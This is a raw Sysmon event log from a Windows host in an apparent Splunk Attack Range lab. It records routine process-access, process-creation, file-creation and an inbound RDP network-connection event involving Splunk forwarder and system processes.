15:00:56.990{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-ECA8-607E-0107-00000000BB01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051166Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051165Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051164Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051163Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051162Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051161Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051160Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051159Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051158Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051157Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-ECA8-607E-0107-00000000BB01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000051156Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-ECA8-607E-0107-00000000BB01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000051155Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.990{85C0FFC9-ECA8-607E-0107-00000000BB01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000051154Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.474{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90CA5D0AC0925CA323E8492EB2655BF0,SHA256=B0738A5BC985EA32DA9906955B86905ABA1FC272D7745926EF8EDAE361527300,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051153Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.458{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52689-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051152Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.162{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=988188A2B4B290A9E3FF54D646340A17,SHA256=2AFAD176D7FE7D72194D3387F84ABC8F8827644B04F0462B64AE4C8838D63A4B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000051151Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-ECA8-607E-0007-00000000BB01}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051150Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051149Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051148Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051147Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051146Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051145Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051144Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051143Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051142Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051141Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-ECA8-607E-0007-00000000BB01}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000051140Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.146{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-ECA8-607E-0007-00000000BB01}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 